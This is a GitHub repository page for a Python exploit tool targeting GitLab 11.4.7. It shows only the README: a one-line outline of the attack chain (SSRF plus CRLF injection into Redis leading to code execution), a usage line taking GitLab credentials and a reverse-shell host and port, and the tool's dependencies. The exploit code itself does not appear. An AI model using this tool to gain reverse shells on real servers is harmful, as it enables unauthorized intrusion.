Skip to content

mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

31 Commits
 
 
 
 
 
 

Repository files navigation

GitLab-11.4.7-Authenticated-Remote-Code-Execution

(SSRF + CRLF -> Redis -> RCE)

Usage : python3 gitlab_rce.py -U `USERNAME` -P `PASSWORD` -l `LHOST` -p `LPORT`

usage: gitlab_rce.py [-h] [-U U] [-P P] [-l L] [-p P]

GitLab 11.4.7 Authenticated RCE

optional arguments:

-h, --help show this help message and exit

-U GitLab Username

-P Gitlab Password

-l rev shell lhost

-p rev shell lport

Dependencies

pip3 install RandomWords==0.3.0

pip3 install bs4

pip3 install requests

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages